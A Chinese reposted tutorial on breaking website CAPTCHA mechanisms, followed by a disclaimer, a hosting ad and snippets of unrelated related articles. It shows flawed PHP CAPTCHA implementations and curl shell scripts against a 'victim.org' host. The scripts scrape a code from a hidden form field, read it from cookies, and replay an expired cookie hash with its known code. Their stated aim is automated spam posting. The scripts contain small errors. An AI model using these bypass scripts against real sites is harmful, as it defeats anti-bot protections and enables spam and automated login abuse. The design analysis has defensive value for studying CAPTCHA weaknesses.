黑客如何破解验证码机制

摘要:
输入要提交到网站进行验证的表单。只有验证成功后才能使用函数。许多验证代码实现都有问题。例如,验证码直接在网页和cookie中提供。2.使用算法将哈希转换为验证码编号,然后转换为图片。3.哈希在cookie中发送给客户端。4.客户端输入带有图片的验证码进行登录。每次您发送验证消息时,请扔掉服务器上的cookie,并使用使用过的cookie和验证码。

    所谓验证码,就是将一串随机产生的数字或符号,生成一幅图片,图片里加上一些干扰象素(防止OCR),由用户肉眼识别其中的验证码信息。

  输入表单提交网站验证,验证成功后才能使用某项功能。不少网站为了防止用户利用机器人自动注册、登录、灌水,都采用了 验证码技术。

  很多验证码实现都有问题。比如直接给出用验证码在网页和cookies中。

  验证码在网页中的例子:

CODE:

<?
   /*
   *    Filename: authpage.php
   *    Author:    hutuworm
   *    Date:    2003-04-28
   *    @Copyleft hutuworm.org
   */

     srand((double)microtime()*1000000);

     //验证用户输入是否和验证码一致
     if(isset($HTTP_POST_VARS['authinput'])) 
     {
           if(strcmp($HTTP_POST_VARS['authnum'],$HTTP_POST_VARS['authinput'])==0)
                 echo "验证成功!";
           else
                 echo "验证失败!";
     }
  
     //生成新的四位整数验证码
     while(($authnum=rand()%10000)<1000); 
   ?>
     <form action=authpage.php method=post>
     <table>
           请输入验证码:<input type=text name=authinput style=" 80px"><br>
           <input type=submit name="验证" value="提交验证码">
           <input type=hidden name=authnum value=<? echo $authnum; ?>>
           <img src=authimg.php?authnum=<? echo $authnum; ?>>
     </table>
     </form>

[Copy to clipboard]

  以上例子直接将验证码储存在负面中,只需下载页面,得到验证码值就可突破限制。

CODE:

#!/bin/sh
curl [url]http://www.vicitm.org/authpage.php[/url]
authinput=`grep '<input type=hidden name=authnum value=[[:digit:]]{4}>' grep.txt | sed -e 's/[^0-9]//g'` #得到网页中的

authnum
curl [url]http://www.vicitm.org/authpage.php[/url] -d name=hacker -d submit="验证" -d authnum=$authnum

[Copy to clipboard]

CODE:

session_register("authnum");
$authnum = strval(rand("1111","9999"));
setcookie("authnum",$authnum);

...
<input type=text name=authnum maxlength=4><img src=get_code.php>
...

if($number != $login_check_number || empty($number))
{
   print("校验码不正确!");
   die();
}


[Copy to clipboard]

第二种要比上一种聪明一点,把验证码值存放在用户Cookies中。可是由于Cookies是用户可读可写,所以也极易被突破。

CODE:

#!/bin/sh
$username=hacker
$password=hackme
curl [url]http://www.vicitm.org/index.php[/url] -c common_cookie        # 接受服务器的初始cookies
curl [url]http://www.vicitm.org/get_code.php[/url] -c $username.cook -b common_cookie # 得到验证码,从cookies中
authnum=`grep authnum $username.cook | cut -f7`
curl [url]http://www.victim.org/login.php[/url] -b $username.cook -d authnum=$authnum -d username=$username -d password=$password # 使用

cookies中的验证码登陆

[Copy to clipboard]

  更高级的验证码。(好像本论坛的就是这种。。。。)

  有一类验证码比以上两种验证码要高级一些,它使用如下算法:

  1、服务器生成一个随机hash。
  2、使用某个算法(不可逆,破解难度高的)将hash转化成为验证码数字,再转化成图片。
  3、hash在cookie中被发送到客户端
  4、客户以图片输入验证码,进行登录。服务器检查f(hash)=验证码。

  特点:因为攻击者不明白服务器所使用的验证码编码算法,所以无法对服务器转来的hash进行直接解析。

  对付这种验证码,我们可以使用“过期cookies法”,方法即:保存服务器一次特定的cookies,将其对应验证码记下。在每次发送验证消息时

  ,强行扔掉服务器传来的cookies,使用这个已被使用过的cookies以及验证码。就好比,一张电话充值卡可以用多次一样。

  如:
  先从服务器上下载一张验证码图片:

  curl http://www.victim.org/get_code.php -c cookie -o auth.png

  人工阅读,得到$savecookie(cookie文件中的hash)和$authnum(验证码)。

  机器人突破验证时,扔掉服务器给的hash,强制使用$savecookie和$authnum进行突破

CODE:

$savecookie=294b506f05f896dcbb3a0dde86a5e36c   
$num=7701
$username=hacker
$password=hackme

curl [url]http://www.victim.org/index.php[/url] -c $username.cookie # 得到初始化cookies,以及session id
grep -v authhash $username.cookie > tmp.$username      # 扔掉服务器给你的hash
echo "[url]www.victim.org[/url]    FALSE    /    FALSE    0    hash    $savecookie" >> tmp.$username # 强行使用过期hash 和验证码 
mv tmp.$username $username.cookie
curl [url]http://www.victim.org/login.php[/url] -b $username.cookie -c $username.cookie -d username=$username -d password=$password -d

authnum=$num # 使用过期验证码登陆。
#登陆成功,去疯狂灌水。。。。。。

[Copy to clipboard]

  最高级的验证码。

  它使用如下方法:

  1、服务器通过用户相关信息(IP,SID等等)生成一个随机hash。
  2、使用某个算法(不可逆,破解难度高的)将hash转化成为验证码数字。
  3、hash不再发送给客户端。它被保存到本地数据库(通常是SESSIONS,有关用户IP等信息),并由一个序列号seq所指向。(这个seq也可以是session id)
  4、seq被作为cookies发送给客户端。
  5、客户以图片输入验证码。
  6、服务器验证方法:服务器并不检查f(hash)==验证码,而是去读取数据库中期望的验证码。。如果用户输入与期望值相同,则验证成功。有些服务器可能还会seq与session id之间的关系进行验继续进行验证。
  7、一旦用户进行了验证操作或重新获取验证码,而是服务器将对数据库中的hash值替换成新的,老值失效过期。

  特点:

  ×过期:由于服务器只期望保存在当前数据库中的验证码,所以无法使用“过期”的验证码(因为已被新验证码所替换)。
  ×高强度:只发送seq,而hash被保存在本地,所以也极难破译出f(hash)函数。

  弱点:

  OCR(光学识别) seq劫持 “验证码”DOS(对某些seq进行反复请求,导致某些用户无法进行正常验证)

  对付这种验证码我没有什么好的方法,简便的方法就是自行下载验证码,并给用户显示后登陆。这种适用只验证一次的场合。如登陆时验证。

CODE:

curl [url]http://www.victim.org/get_code.php[/url] -c validate.png -c validcode_cookie # 得到验证码图片,和对应seq。
seq=`grep seq validcode_cookie | cut -f7`
echo -n 请输入validate.png中的验证码:
read valid_number # 输入验证码
# 登陆,并进行某种自动化操作,如疯狂灌水。

免责声明:文章转载自《黑客如何破解验证码机制》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇CentOS7压缩目录及解压Unity3D的GUI插件(UIToolkit,GUIX)下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

vue--axios发送请求

首先安装:axios $ npm install axios $ cnpm install axios //taobao源 $ bower install axios 或者使用cdn: <script src="https://unpkg.com/axios/dist/axios.min.js"></script> main...

对于反爬虫伪装浏览器进行爬虫

对于爬虫中部分网站设置了请求次数过多后会封杀ip,现在模拟浏览器进行爬虫,也就是说让服务器认识到访问他的是真正的浏览器而不是机器操作 简单的直接添加请求头,将浏览器的信息在请求数据时传入: 打开浏览器--打开开发者模式--请求任意网站 如下图:找到请求的的名字,打开后查看headers栏,找到User-Agent,复制。然后添加到请求头中 代码如下: 1...

python-上传文件的几种方式

from requests_toolbelt import MultipartEncoder import requests # from_data上传文件,注意参数名propertyMessageXml data = MultipartEncoder(fields={'propertyMessageXml': ('filename', open('D:...

window.open()打开新窗口 及参数

在jsp页面中需要使用到弹出窗口,想到js的window对象有一个open方法可以弹出窗口,于是对open方法进行记录。 首先是open方法的语法及定义: 定义: open() 方法用于打开一个新的浏览器窗口或查找一个已命名的窗口。 window.open(URL,name,features,replace) 4个参数理解如下: open()方法的参数...

分享如何使用PHP将URL地址参数进行加密传输提高网站安全性

大家在使用PHP进行GET或POST提交数据时,经常会在URL带着参数进行传递,比如www.mdaima.com/get.php?id=1&page=5,这里就将id编号和page页码进行了参数传递,如果这样直接明文传输,会将参数直接暴露给用户,要是是比较重要的数据这样传输我觉得还是不太安全。那如果将参数变成下面这样,是不是会好点呢? 1 w...

web服务器出现大量CLOSE_WAIT连接的前因后果

公司网站一直很稳定,前段时间开始偶尔出现网站无法打开,提示504的错误,运维有怀疑是程序更新引起的,但是仔细看过代码并没有获取数据量过大的地方,而且数据库表现也一直很平稳。所以一直也无从下手,不知道问题出在哪里,每一次出现这个问题重启下iis可以解决,或者有的时候是过段时间自己就解决了,所以这个问题一直悬而未决。 直到昨天晚上网站再次更新,在进行功能验证的...